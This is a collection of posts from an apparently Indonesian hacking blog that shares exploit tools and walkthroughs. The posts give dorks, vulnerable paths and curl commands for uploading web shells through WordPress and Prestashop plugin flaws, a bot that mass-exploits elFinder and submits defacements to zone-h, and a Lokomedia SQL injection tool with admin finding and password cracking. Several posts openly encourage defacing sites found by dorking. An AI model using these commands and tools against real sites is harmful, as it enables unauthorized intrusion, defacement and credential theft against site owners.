Codes Xploit: exploiter
Showing posts with label exploiter. Show all posts
Showing posts with label exploiter. Show all posts

Realease Tools Pentester Mrcakil v2.1

 
hay guys :v cie berjumpa lagi sama cakil :v
cakil kali ini akan share tools pentester :v kali aja berguna buat kalian
langsung ae guys :v

Realease : kamis.07 Desember
author : Mr.cakil
thanks to : 4wsec - Mr.Tenwap
fiture ?
 01) Red Hawk
 02) D-Tect
 03) Hunner
 04) WPScan
 05) Webdav
 06) Metasploit
 07) Kali Nethunter
 08) Ubuntu
 09) Youtube Dl
 10) viSQL
 11) Weeman
 12) WFDroid
 13) FBBrute
 14) Ngrok
 15) Torshammer
 16) RouterSploit
 17) Hydra
 18) Weevely
 19) SQLMap
 20) Dirbuster
 21) admin finder
 22) lokomedia exploiter
 23) elfinder exploiter
 24) magento add admin exploiter
 25) scanner tools
 26) bing dorker
 27) katoolin
 28) arch linux
 29) linux fedora
 30) hash-buster
 31) sudo
 32) aircrack-ng
 33) joomscan
 34) bing-ip2hosts
 35) BlueMaho
 36) Bluepot
 37) honeypot
 38) bot auto deface 1
 39) bot auto deface 2
 40) mailer sender cli
 41) Wordpress Brute Force
 42) Oh-myzsh theme for termux
 43) instabot (instagram bot)
 44) exit

 berikut tampilan nya
nah gud kan :v
oh iya disitu ada 2 paket ya
tools (itu buat termux)
kalo yang tools2 (all linux) gnuroot ? insya allah

tester : termux/ ubuntu 17.10 / kali linux
langsung ae nih link nya bree
sini bang :v
kritik or saran monggo :)

WordPress Plugin Job Manager File Upload

Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

WordPress Business Directory Plugin File Upload


Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Prestashop Module Blocktestimonial File Upload


[+] Google Dork: inurl:"/modules/blocktestimonial/"
[+] Vuln: www.target.com/modules/blocktestimonial/addtestimonial.php
[+] Tutorial:
- http://www.tkjcyberart.org/2016/12/prestashop-blocktestimonial-upload.html
- http://3xploi7.blogspot.co.id/2016/12/pretashop-blocktestimonial-upload-shell.html
[+] Exploiter: http://pastebin.com/8kvqR7u1 ( Web Based )


Saya sudah membuat tools untuk memudahkan kita mengexploit targetnya....

Silakan download exploiternya, lalu upload di shell/hosting untuk menjalankannya
Oke Sekian dulu, happy hacking :D
NB: Sumber tertera diatas


Bot Auto Tusbol Hosting Nazuka

 
Haloo guys. Kali ini ane mau share bot bing dorker + auto exploit + zone-h submit untuk exploit elfinder di hostig nazuka. Jadi tinggal masukkan dork bing nya, tinggal coli, dan biarkan bot yang bekerja. Biar rata sekalian hahaha :D .
Pertama tau exploit ini sebenernya 4 hari yang lalu, di grup chat Jancok Security. Tapi pas baca, saya gak tertarik samasekali . Maklum, saya sudah gak minat sama deface deface. Cuman tadi mau nyari berita di zone-h kok banyak arsip hosting nazuka, jadi kepikiran buat bot nya.
Untuk script nya bisa download disini :
Sebelumnya thanks banget buat Mr.MaGnoM, atas referensi bing dorker nya. Big respect bro :)
Oh iya, disini ada beberapa parameter yang harus diubah.
$zh = "zafk1el"; 
Itu nick zone-h. Silahkan diganti sendiri ya.
Lalu bagian 
$isi_nama_doang = 
Yang di encode tersebut script deface . Jadi silahkan diganti dengan cara encode terlebih dahulu script deface kalian ke base64 lalu masukkan kesitu.
Cara pakainya gimana bang ?
Gampang banget. 
Tinggal masukkan perintah
php namafile.php
Lalu enter. Selanjutnya masukkan bing dork nya.
PS : Ini CLI based, bukan web based. Dan juga ini BING dorker, jadi jangan pakai dork google. 
Thanks.

Lokomedia (SQL Injection) + Auto Scan Admin Login + Auto Crack Password

 
Hallo~~ selamat malam, kali ini gua akan share tools lagi buat kalian penyuka exploit sql injection CMS Lokomedia.
Biar ga pusing-pusing, ini tools gua buat supaya lebih mudah aja hehehe

Oke Langsung aja ini dia penampakan tools nya: [ CLI ]


[ Web Based ]



Cara Pake: [CLI]
- Masukan file lokomedia.php dan target.txt nya kedalam 1 folder yang sama.
- format target di dalam file target.txt

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/
- bukalah cmd (install xampp terlebih dahulu jika kalian menggunakan OS Windows).
jalankan command berikut: php lokomedia.php target.txt

Cara Pake: [Web Based]
- upload script ke hosting/shell kalian.
- buka file exploiter tersebut ( web.com/lokomedia.php )
- masukan targetnya

http://target.com/
http://target2.com/
http://target3.com/
http://target4.com/


LINK [ CLI ] -> http://pastebin.com/sPpJRjCZ
LINK [ Web Based ] -> http://pastebin.com/0STXanAx

mudah bukan? hehehe.
Oke Sekian dulu, selamat malamm ^^